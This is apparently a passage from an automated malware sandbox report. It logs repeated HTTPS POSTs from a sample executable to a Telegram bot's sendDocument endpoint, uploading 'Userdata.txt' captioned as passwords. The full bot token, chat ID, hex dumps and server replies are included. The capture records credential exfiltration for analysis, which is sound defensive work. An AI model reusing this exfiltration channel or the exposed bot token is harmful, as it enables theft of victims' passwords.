                                                                                                          2025-01-10 22:12:08 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 66 39 61 37 65 33 63 63 38 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd31f9a7e3cc8bContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:08 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:08 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:08 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 32 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44790,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547128,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          9192.168.2.949989149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:09 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd320b8d01f7ea
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 22:12:09 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 30 62 38 64 30 31 66 37 65 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd320b8d01f7eaContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:09 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:09 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:09 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 39 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 32 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44791,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547129,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          10192.168.2.949992149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:11 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd3220243286cd
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 22:12:11 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 32 30 32 34 33 32 38 36 63 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd3220243286cdContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:11 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:11 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:11 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 33 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44792,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547131,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          11192.168.2.949994149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:12 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd32334eab1922
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 22:12:12 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 33 33 34 65 61 62 31 39 32 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd32334eab1922Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:13 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:13 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:13 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 33 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44793,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547133,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          12192.168.2.949996149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:14 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd3247c90beef3
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 22:12:14 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 34 37 63 39 30 62 65 65 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd3247c90beef3Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:14 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:14 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:14 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 39 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 33 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44794,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547134,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          13192.168.2.949998149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:16 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd325ad854f9ca
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 22:12:16 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 35 61 64 38 35 34 66 39 63 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd325ad854f9caContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:17 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:16 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:17 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 33 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44795,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547136,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          14192.168.2.950000149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:18 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd3275fbf52428
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 22:12:18 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 37 35 66 62 66 35 32 34 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd3275fbf52428Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:18 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:18 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:18 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 39 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 33 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44796,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547138,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          15192.168.2.950002149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:20 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd3288eb61d7c5
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
